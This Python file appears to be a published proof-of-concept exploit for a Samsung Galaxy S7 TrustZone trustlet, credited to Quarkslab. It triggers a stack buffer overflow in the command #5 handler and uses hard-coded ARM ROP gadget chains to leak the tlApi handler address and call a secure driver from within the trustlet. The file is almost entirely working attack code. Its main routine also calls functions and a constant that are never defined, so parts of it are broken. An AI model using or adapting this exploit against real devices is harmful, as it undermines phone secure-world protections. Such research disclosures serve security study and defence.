# trustlet.py: Proof of concept exploit for Samsung S7 trustlet.
# Copyright (C) 2019-2020 Quarkslab SAS.
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/
#
#
#
import argparse
import struct
import sys
import subprocess

from mcclient import *


TCI_BUFFER_ADDRESS = 0x100000


class TrustletInterface(object):

    DEVICE_ID = DEVICE_ID_DEFAULT
    TCI_BUFFER_SIZE = 0x20000
    TRUSTLET_UUID = "fffffffff0000000000000000000001b"
    TRUSTLET_FILE = "/data/local/tmp/binaries/s7/{}.tlbin".format(TRUSTLET_UUID)

    def __enter__(self):
        self._device = Device(self.DEVICE_ID)
        self._device.open()
        self._tci = self._device.malloc(self.TCI_BUFFER_SIZE)
        with open(self.TRUSTLET_FILE, "rb") as file:
            bs = file.read()
        self._session = Trustlet(self._device, self._tci, bs)
        self._session.open()
        return self

    def __exit__(self, *args):
        self._session.close()
        self._device.close()

    @property
    def tci(self):
        return self._tci

    @property
    def session(self):
        return self._session

    def buffer_overflow_exploit(self, *args, r4=0, r5=0, r6=0,
                                r7=0, r8=0, r9=0):
        """
        Exploitation of the buffer overflow in the handler for the
        command #5

        The source and size of the buffer are user-provided:
            - The source buffer is located at tci_buffer+0x8
            - The buffer size is located at tci_buffer+0x16808

        Using these information, the trustlet will copy the buffer provided
        in the TCI buffer directly on the stack, leading to a stack-based
        buffer overflow if the size is greater than 0xec.
        """

        self._tci.seek(0)
        self._tci.write_dword(5)                # Vulnerable command id
        self._tci.seek(8)                       # Start of the buffer to copy
        self._tci.skip(0xd8)                    # Padding

        self._tci.write_dword(r4)               # Saved R4 value
        self._tci.write_dword(r5)               # Saved R5 value
        self._tci.write_dword(r6)               # Saved R6 value
        self._tci.write_dword(r7)               # Saved R7 value
        self._tci.write_dword(r8)               # Saved R8 value

        for ropchain in args:
            for gadget in ropchain:
                self._tci.write_dword(gadget)   # Ropchain

        self._tci.seek(0x16808)                 # Offset to controlled length
        self._tci.write_dword(0x200)            # Controlled length value

        try:
            self._session.notify()
            self._session.wait_notification()
        except Error:
            pass


class RopChain(object):
    
    @staticmethod
    def call_notify_and_wait():
        """
        Notifies the Normal World with `tlApiNotify` and calls
        `tlApiWaitNotification` with the correct `timeout=0xffffffff`
        Also resets R4 to the TCI buffer address
        """
        ropchain = []
        ropchain += [0x0001f581]

        # 0x0001f580 (0x0001f581): pop {r4, r5, r6, pc};
        ropchain += [TCI_TL_BUFFER_ADDRESS]
        ropchain += [0xffffffff]
        ropchain += [0xdeadbeef]
        ropchain += [0x207C1]

        return ropchain


    @staticmethod
    def read_dword(address_to_leak, output_address):
        """
            Function reading a dword in memory at the address `address_to_leak`
            and writing it into `output_address`.
        """
        ropchain = []

        # Return address
        ropchain += [0x07d07661]

        # 0x07d07660 (0x07d07661): pop {r1, r2, r3, r4, r5, pc};
        ropchain += [address_to_leak - 4]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [output_address]
        ropchain += [0xdeadbeef]
        ropchain += [0x07d0940f]

        # 0x07d0940e (0x07d0940f): ldr r0, [r1, #4]; pop {pc};
        ropchain += [0x07d0244d]

        # 0x07d0244c (0x07d0244d): str r0, [r4]; pop {r4, pc};
        ropchain += [0x2079D]

        return ropchain

    @staticmethod
    def call_driver(driver_id, payload_address, retval_address, tlapi_handler):
        """
        Function calling tlApi_callDriver using directly the tlApi handler
        address. The arguments passed to the handler are:
            - R0: the ID of tlApi_callDriver, which is 0x8
            - R1: the driver ID
            - R2: a pointer to the data that will be processed by the
                    secure driver
        """
        ropchain = []
        tlApi_callDriver_id = 0x8 # ID of tlApi_callDriver

        # Return address
        ropchain += [0x07d069e5]

        # 0x07d069e4 (0x07d069e5): pop {r0, r1, r2, r3, pc};
        ropchain += [tlapi_handler]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0x07d01013]

        # 0x07d01012 (0x07d01013): mov r12, r0; pop.w {r0-r4, lr}; bx r12;
        ropchain += [tlApi_callDriver_id]
        ropchain += [driver_id]
        ropchain += [payload_address]
        ropchain += [0x0]
        ropchain += [retval_address]
        ropchain += [0x07d0244d]

        # 0x07d0244c (0x07d0244d): str r0, [r4]; pop {r4, pc};
        ropchain += [0x2079D]

        return ropchain


def main():
    tl_output_length = 0x100
    tl_output_offset = 0x80
    tl_output_addr = TCI_BUFFER_ADDRESS + tl_output_offset
    address_to_leak = 0x108c
    tlapi_handler = 0x0

    #--------------------------------------------------------------------------
    # Retrieving the tlApi handler address (should be 0x7d01008)
    with TrustletInterface() as tl_if:
        print("[-] Leaking the tlApi handler")
        tl_if.buffer_overflow_exploit(
            RopChain.read_dword(address_to_leak, tl_output_addr),
            RopChain.call_unmatched_command_id()
        )
        tl_if.tci.seek(tl_output_offset)
        tlapi_handler = tl_if.tci.read_dword()

    print("[+] tlApi handler at 0x{:08x} = 0x{:08x}".format(address_to_leak,
                                                            tlapi_handler))
    #--------------------------------------------------------------------------

    if not tlapi_handler:
        print("[-] Could not retrieve the tlApi handler address")
        sys.exit(0)

    #--------------------------------------------------------------------------
    # Communicating with the VALIDATOR secure driver
    dr_id = 0x40002
    dr_payload_offset = 0x200
    dr_retval_offset = 0x90
    dr_payload_addr = TCI_BUFFER_ADDRESS + dr_payload_offset
    dr_retval_addr = TCI_BUFFER_ADDRESS + dr_retval_offset
    dr_command_id = 0xba0bab

    with TrustletInterface() as tl_if:
        print("[+] Setting up the payload to send to the secure driver")
        payload_chunk = [
                0xdeadbeef,
                dr_command_id,   # The value that should appear in the logs
                0x00,
                0x00,
        ]
        tl_if.tci.seek(dr_payload_offset)
        for dword in payload_chunk:
            tl_if.tci.write_dword(dword)

        print("[+] Starting the buffer overflow exploit")
        tl_if.tci.seek(0)
        tl_if.buffer_overflow_exploit(
            RopChain.call_driver_ex(
                dr_id,
                dr_payload_addr,
                dr_retval_addr,
                tlapi_handler),
            RopChain.call_unmatched_command_id()
        )
        print("[+] Exploit completed")
    #--------------------------------------------------------------------------


if __name__ == "__main__":
    main()
